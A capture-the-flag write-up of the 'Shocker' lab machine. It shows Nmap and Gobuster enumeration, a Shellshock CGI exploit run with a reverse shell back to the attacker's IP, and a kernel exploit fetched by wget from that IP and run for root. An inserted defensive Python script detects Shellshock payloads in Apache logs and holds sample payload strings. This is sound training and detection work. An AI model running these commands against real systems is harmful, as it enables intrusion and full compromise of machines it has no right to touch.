The first step was to scan the machine with Nmap to find running services.
# Nmap 7.80 scan initiated Sun Oct 4 13:05:39 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.9 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 4 13:06:11 2020 -- 1 IP address (1 host up) scanned in 32.42 seconds
We can see from the output that the host is running Apache 2.4.18 on port 80 and OpenSSH on port 2222. I browsed to the site on Apache and was greeted with:
I then ran Gobuster against the machine to try and find hidden files.
root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/06 14:02:31 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/10/06 14:04:39 Finished
===============================================================
As you can see, the initial scan found nothing significant; it did however indicate the presence of a cgi-bin directory. I decided to perform an additional scan against this directory using the same wordlist, this time looking for the multiple file extensions that would generally be found in cgi-bin.
root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56/cgi-bin --wordlist /usr/share/wordlists/dirb/big.txt -x cgi,php,bat,html,htm,sh,asp,aspx,CGI,shtm,shtml
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx,shtm,shtml,bat,html,sh,asp,cgi,php,htm,CGI
[+] Timeout:        10s
===============================================================
2020/10/05 15:15:55 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.htaccess.bat (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.asp (Status: 403)
/.htaccess.aspx (Status: 403)
/.htaccess.shtm (Status: 403)
/.htaccess.shtml (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.CGI (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.CGI (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.asp (Status: 403)
/.htpasswd.aspx (Status: 403)
/.htpasswd.shtm (Status: 403)
/.htpasswd.shtml (Status: 403)
/.htpasswd.bat (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/10/05 15:25:31 Finished
===============================================================
You can see right at the bottom of this output that the file user.sh was discovered. Requesting this file returns the following:
Content-Type: text/plain

Just an uptime test script
 14:08:46 up 23:07,  0 users,  load average: 0.00, 0.00, 0.00
There's a big hint in the name of the machine, Shocker: it's very likely to be vulnerable to the Shellshock vulnerability. After some Googling I discovered an exploit for this version of Apache: a remote command injection Shellshock vulnerability that can be executed against CGI scripts. I downloaded the exploit and ran it against the Shocker machine, specifying the user.sh file in the arguments:
root@kali:/home/kali/Documents/shocker# python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.38 lport=2600 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> ls
user.sh
10.10.10.56> cd /
10.10.10.56> ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var vmlinuz vmlinuz.old
10.10.10.56> cd home
10.10.10.56> ls
shelly
10.10.10.56> cd shelly
10.10.10.56> ls
user.txt
10.10.10.56> cat user.txt
[REDACTED]
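From the defender's side, the request that an exploit like the one above sends is easy to spot: Shellshock is a Bash bug reached through Apache's mod_cgi, which exports request headers into the environment of the CGI script, and the default "combined" access log records two of those headers (Referer and User-Agent). The following Python script is an added example, not code from the original post; it assumes the default combined LogFormat, and every log line in it is constructed for the demonstration.

```python
"""Spot Shellshock-style payloads in Apache 'combined' access log lines.

Added example for this writeup, not code from the original post. Assumes the
default 'combined' LogFormat, which records the Referer and User-Agent
headers; a CGI exploit that pushes a Bash function definition through either
header leaves the '() {' prefix there. Sample lines are constructed.
"""
import re

# combined format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Exported-function prefix Shellshock relies on, tolerating spacing variants.
# Ordinary parenthesised User-Agents such as "(X11; Linux)" do not match.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample: two benign requests, then one payload in the
# User-Agent header and one in the Referer header.
SAMPLE_LOG = [
    '10.10.14.38 - - [06/Oct/2020:13:50:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.38 - - [06/Oct/2020:13:50:02 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.68.0"',
    '10.10.14.38 - - [06/Oct/2020:13:50:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo shellshock-test"',
    '10.10.14.38 - - [06/Oct/2020:13:50:04 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { x; }; echo y" "Mozilla/5.0"',
]

def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock_attempts(lines):
    """Return (line_no, ip, request, header) for each line carrying a function-definition prefix."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = parse_combined(line)
        if fields is None:          # malformed line: skip rather than crash
            continue
        for header in ("referer", "agent"):
            if SHELLSHOCK_RE.search(fields[header]):
                hits.append((n, fields["ip"], fields["request"], header))
                break
    return hits

if __name__ == "__main__":
    for n, ip, request, header in find_shellshock_attempts(SAMPLE_LOG):
        print("line %d: %s sent %r with payload in %s header" % (n, ip, request, header))
```

On a real server the same check belongs in the log pipeline for every CGI path, and a hit against a host whose bash has not been patched is the signal to treat the box as compromised rather than merely probed.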
As you can see from the output above, the exploit executed successfully and I was able to cat the user flag. I now needed to escalate privileges to capture the root flag. I checked the kernel version and found it was running 4.4.0-96-generic.
10.10.10.56> uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
A quick Google search found a kernel exploit for this kernel version. I downloaded the exploit and compiled it:
root@kali:/home/kali/Downloads# gcc 44298.c -o 44
I then hosted the binary on a Python simple HTTP server and downloaded it onto the Shocker machine with wget:
10.10.10.56> wget http://10.10.14.38:8000/44
--2020-10-06 13:57:42--  http://10.10.14.38:8000/44
10.10.10.56> ls -la
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: '44'

     0K .......... .......                                   100%  337K=0.05s

2020-10-06 13:57:42 (337 KB/s) - '44' saved [17880/17880]
The file was then made executable with chmod +x and executed:
10.10.10.56> chmod +x 44
10.10.10.56> ./44
10.10.10.56> whoami
root
You can see from the output that it executed successfully and I now had a root shell on the machine. I finished by capturing the root flag:
10.10.10.56> cd /root
10.10.10.56> ls
root.txt
10.10.10.56> cat root.txt
[REDACTED]